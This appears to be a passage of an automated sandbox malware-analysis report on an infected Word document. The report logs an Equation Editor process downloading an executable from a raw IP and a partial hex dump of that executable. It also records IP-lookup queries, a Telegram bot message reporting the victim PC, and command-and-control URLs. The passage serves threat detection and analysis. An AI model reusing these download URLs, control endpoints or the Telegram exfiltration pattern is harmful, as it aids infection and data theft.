                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Wed, 30 Oct 2024 07:32:00 GMTContent-Type: application/x-msdos-programContent-Length: 787456Connection: keep-aliveLast-Modified: Tue, 29 Oct 2024 06:13:05 GMTETag: "c0400-625977a7fa7d4"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 58 f4 f3 fa 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fa 0b 00 00 08 00 00 00 00 00 00 c2 19 0c 00 00 20 00 00 00 20 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6e 19 0c 00 4f 00 00 00 00 20 0c 00 a4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0c 00 0c 00 00 00 98 f6 0b 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c8 f9 0b 00 00 20 00 00 00 fa 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a4 05 00 00 00 20 0c 00 00 06 00 00 00 fc 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0c 00 00 02 00 00 00 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a2 19 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 75 00 00 90 69 00 00 03 00 00 00 5e 00 00 06 40 df 00 00 58 17 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1d 00 00 00 00 00 00 00 02 28 1d 00 00 0a 00 00 00 02 28 06 00 00 06 7d 01 00 00 04 00 de 05 26 00 00 de 00 2a 00 00 00 01 10 00 00 00 00 08 00 0f 17 00 05 12 00 00 01 13 30 01 00 0c 00 00 00 01 00 00 11 00 02 7b 01 00 00 04 0a 2b 00 06 2a 1b 30 02 00 25 00 00 00 02 00 00 11 00 00 02 7b 01 00 00 04 03 6f 1e 00 00 0a 28 07 00 00 06 0a de 0d 26 00 72 01 00 00 70 73 1f 00 00 0a 7a 06 2a 00 00 00 01 10 00 00 00 00 01 00 15 16 00 0d 12 00 00 01 1b 30 02 00 29 00 00 00 03 00 00 11 00 00 03 04 28 09 00 00 06 0a 06 2c 0d 00 02 28 06 00 00 06 7d 01 00 00 04 00 02 7b 01 00 00 04 0b de 04 26 00 fe 1a 07 2a 00 00 00 01 10 00 00 00 00 01 00 22 23 00 04 12 00 00 01 1b 30 03 00 45 00 00 00 03 00 00 11 00 00 02 7b 01 00 00 04 05 03 6f 20 00 00 0a 00 05 04 02 7b 01 00 00 04 28 08 00 00 06 0a 06 2c 15 00 02 28 06 00 00 06 7d 01 00 00 04 02 7b 01 00 00 04 0b de 0d 02 7b 01 00 00 04 0b de 04 26 00 fe 1a 07 2a 00 00 00 01 10 00 00 00 00 01 00 3e
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2010/30/2024%20/%208:13:13%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: SHARCOM-ASBG SHARCOM-ASBG
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49170 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49168 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49172 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49165 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49179 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49167 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49175 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49173 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49181 -> 188.114.97.3:443
                  Source: global trafficHTTP traffic detected: GET /txt/pgTQ4mfZBbJhpdd.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8FEE9B89-F0FF-409D-80D0-E8095DD9B851}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2010/30/2024%20/%208:13:13%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /txt/pgTQ4mfZBbJhpdd.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 30 Oct 2024 07:32:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: cdlpohalgate39567.exe, 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.428467332.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/pgTQ4mfZBbJhpdd.exe
                  Source: EQNEDT32.EXE, 00000002.00000002.428467332.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/pgTQ4mfZBbJhpdd.exeC:
                  Source: EQNEDT32.EXE, 00000002.00000002.428467332.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/pgTQ4mfZBbJhpdd.exeIP
                  Source: EQNEDT32.EXE, 00000002.00000002.428467332.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/pgTQ4mfZBbJhpdd.exej
                  Source: EQNEDT32.EXE, 00000002.00000002.428467332.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/pgTQ4mfZBbJhpdd.exettC:
                  Source: cdlpohalgate39567.exe, 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: cdlpohalgate39567.exe, 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000269B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000268D000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002586000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000262A000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002636000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002644000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000267F000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000266D000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000268D000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000025C9000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002586000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000262A000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002636000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002644000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002651000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000267F000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.000000000266D000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942629985.0000000002619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942629985.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942265984.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: cdlpohalgate39567.exe, 00000005.00000002.438924652.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, cdlpohalgate39567.exe, 00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: cdlpohalgate39567.exe, 00000007.00000002.943786428.0000000005C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: cdlpohalgate39567.exe, 00000007.00000002.943786428.0000000005C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: cdlpohalgate39567.exe, 00000007.00000002.942265984.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
